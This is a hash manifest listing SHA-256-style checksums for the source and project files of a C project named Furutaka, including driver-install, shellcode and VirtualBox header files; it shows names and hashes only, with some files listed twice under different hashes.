e25d0088a6c73c51243aac3a21e9384b24844e54f0a093d75fbf0ef44c2ff83d *Source\Furutaka\cui.c
6f145796c9bb2bd9413fe12926436c04cc0dd596be716d7423150299b39d02a0 *Source\Furutaka\cui.h
24bd86affa81071e8e4ba82368e6004ede1c4dd5234c21098c4e7563ee25721a *Source\Furutaka\Furutaka.sln
16bd5cb1f9114683a8f5b91d8f5492319b64f5b1dd5103b56c9c29c39b06237b *Source\Furutaka\Furutaka.vcxproj
656a1ebfb8ca2b136b446d8bdeac9618d27ae1f6e06c08dee0d2fb8885b0e3a1 *Source\Furutaka\Furutaka.vcxproj
b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters
b4d5fe6532f439d6c1161b06dfe90a6bee063c003645204d31b678efd033ae51 *Source\Furutaka\Furutaka.vcxproj.user
1a80c208b491fcd2704761490a12067ae8aa73d8bde834a20920cbd231affaf7 *Source\Furutaka\global.h
9b9f412b442a3a328693af6f6be5bc3f00b0723e49012e6395d3d5eb9184b078 *Source\Furutaka\global.h
94cbbb81022dbd0205a3e7ede89775b43f9f45e934a3079fdb7f5217d8794fe0 *Source\Furutaka\instdrv.c
33b8666748f027ff93707e6e2a1b52303c3664399000ff18b4a8fe864b731640 *Source\Furutaka\instdrv.h
c1747f460d8e42e18f3fce8c30c51be75fe382332f586756bbb86af81e8a5a45 *Source\Furutaka\main.c
2e0ae7d721d15facb6a63af2df430ce5a1d6250fdb78fc7511e24c23a2d73a9a *Source\Furutaka\main.c
8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h
fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h
2dad59a7d37bfc28fc1e0f3599584454084e5837649facde829373f41b86e08f *Source\Furutaka\resource.rc
f8cafd307ba14b60970fe8caf73fbb2f178d3877a3d8b51f507b431e3bf5506e *Source\Furutaka\shellcode.h
2ae545acec81745467b20da56f88a31df07de2021456d82dc16dbbe9ce0b3103 *Source\Furutaka\resource.rc
6f8ae02b3a6da025d5f918080e70245760d472dd5eb23fcc3964d425bee41336 *Source\Furutaka\shellcode.h
fd0fc26c051a852fe3eaf9cb44615543b92e642274fc1eb58b53f23457fd4e89 *Source\Furutaka\sup.c
059014233efa8963d28b21f77aa37ae1c0ed3e152a9737ae8ec45338dee1d860 *Source\Furutaka\sup.h
12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h